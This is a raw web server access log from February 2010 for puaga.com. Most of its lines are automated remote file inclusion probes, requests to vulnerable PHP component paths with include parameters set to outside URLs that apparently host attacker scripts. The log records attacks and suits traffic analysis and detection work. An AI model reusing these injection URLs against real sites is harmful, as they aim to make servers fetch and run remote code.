82.151.132.176 - - [15/Feb/2010:10:29:36 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:10:29:46 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:10:29:46 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:10:29:46 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:30:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:30:21 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:30:21 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:30:33 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:30:55 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:30:55 -0800] "GET /logs/access_100116.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:30:55 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:32:32 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:32:35 -0800] "GET /logs/access_100116.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:32:40 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [15/Feb/2010:10:35:05 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [15/Feb/2010:10:35:05 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [15/Feb/2010:10:35:05 -0800] "GET /logs/access_100201.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:35:07 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:36:17 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [15/Feb/2010:10:36:49 -0800] "GET /logs/access_100112.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:10:37:19 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:37:41 -0800] "GET /logs/access_100125.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:38:24 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:38:48 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:04 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:04 -0800] "GET /logs/access_100114.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:05 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:05 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:05 -0800] "GET /logs/access_100114.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:05 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [15/Feb/2010:10:39:40 -0800] "GET /logs/access_100112.log%20%20///write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:47 -0800] "GET /logs/access_100201.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:39:49 -0800] "GET /logs/access_100201.log%20%20///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET /logs/access_100207.log///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:03 -0800] "GET /logs/access_100207.log///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.156.44 - - [15/Feb/2010:10:40:03 -0800] "GET /logs/access_100104.log/components/com_simpleboard/image_upload.php?sbp=http://www.dengeelektronik.com/urunresim/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:06 -0800] "GET /logs/access_100207.log///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:06 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:07 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:40:09 -0800] "GET /logs/access_091231.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:13 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:13 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:13 -0800] "GET /logs/access_100207.log///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:42 -0800] "GET /logs/access_100207.log%20%20///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:42 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:42 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:42 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:43 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:44 -0800] "GET /logs/access_100207.log%20%20///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:44 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:48 -0800] "GET /logs/access_100207.log%20%20///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:48 -0800] "GET /logs///employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:10:40:48 -0800] "GET //employer_registration.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:41:05 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [15/Feb/2010:10:41:16 -0800] "GET /ams//?_SERVER[DOCUMENT_ROOT]=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [15/Feb/2010:10:41:16 -0800] "GET /logs//ams//?_SERVER[DOCUMENT_ROOT]=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [15/Feb/2010:10:41:16 -0800] "GET /logs/access_100114.log%20%20//ams//?_SERVER[DOCUMENT_ROOT]=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:10:41:29 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:02 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:02 -0800] "GET /logs/access_100114.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:03 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:04 -0800] "GET /logs/access_100114.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:04 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:42:04 -0800] "GET /logs///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:45:25 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:45:25 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:45:25 -0800] "GET /logs/access_100129.log%20%20//classes/adodbt/sql.php?classes_dir=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:45:45 -0800] "GET /logs/access_100116.log%20%20//classes/adodbt/sql.php?classes_dir=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [15/Feb/2010:10:46:01 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:09 -0800] "GET /login/ HTTP/1.0" 200 6675 "http://puaga.com/login/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:10 -0800] "GET /login/register.php HTTP/1.0" 200 4973 "http://puaga.com/register.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:10 -0800] "POST /login/register.php HTTP/1.0" 200 4973 "http://puaga.com/login/register.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:11 -0800] "GET /login/ HTTP/1.0" 200 6675 "http://puaga.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:11 -0800] "POST /login/ HTTP/1.0" 200 6806 "http://puaga.com/login/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
95.71.48.26 - - [15/Feb/2010:10:46:12 -0800] "GET /login/ HTTP/1.0" 200 6675 "http://puaga.com/login/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "puaga.com"
58.150.99.144 - - [15/Feb/2010:10:46:35 -0800] "GET /logs///g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:46:35 -0800] "GET //g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:46:35 -0800] "GET /logs/access_100203.log%20%20///g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:10:46:42 -0800] "GET /logs/access_100114.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:47:25 -0800] "GET /logs/access.log/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:47:25 -0800] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [15/Feb/2010:10:47:25 -0800] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://zoaweb.cl/profesional/id.txt???%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:47:53 -0800] "GET /logs/access.log/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:47:53 -0800] "GET /components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.55.146.200 - - [15/Feb/2010:10:47:53 -0800] "GET /logs/components/com_rssfactory/pseudorefresh.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:48:30 -0800] "GET /logs///g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:48:30 -0800] "GET //g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:48:30 -0800] "GET /logs/access_100203.log%20%20///g4/bbs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:10:49:56 -0800] "GET /logs/access_100124.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:10:49:56 -0800] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:10:49:56 -0800] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:10:52:21 -0800] "GET /logs/access_100114.log%20%20//ams//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:10:52:21 -0800] "GET /ams//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:10:52:21 -0800] "GET /logs//ams//?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:54:03 -0800] "GET /admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://ebaroque.co.kr/page/1??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:54:03 -0800] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [15/Feb/2010:10:54:06 -0800] "GET /logs/access_100125.log%20%20//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://ebaroque.co.kr/page/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:10:56:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:10:56:51 -0800] "GET /logs/access_100116.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:10:56:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:10:57:21 -0800] "GET /logs/access_100104.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:59:02 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:59:02 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:59:02 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:59:54 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:10:59:57 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:11:00:02 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:11:00:48 -0800] "GET /logs/////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:11:00:48 -0800] "GET /logs/access_100203.log/////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [15/Feb/2010:11:00:49 -0800] "GET ////index.php/?_SERVER[DOCUMENT_ROOT]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.255.156.44 - - [15/Feb/2010:11:00:51 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dengeelektronik.com/urunresim/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.255.156.44 - - [15/Feb/2010:11:00:51 -0800] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dengeelektronik.com/urunresim/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.255.156.44 - - [15/Feb/2010:11:00:51 -0800] "GET /logs/access_100205.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dengeelektronik.com/urunresim/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:11:01:29 -0800] "GET /logs/access_100202.log%20%20//bismillahirrohmanirrohim/////delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:11:01:29 -0800] "GET /bismillahirrohmanirrohim/////delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:11:01:49 -0800] "GET /logs/access_100128.log%20%20//bismillahirrohmanirrohim/////delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:11:02:11 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
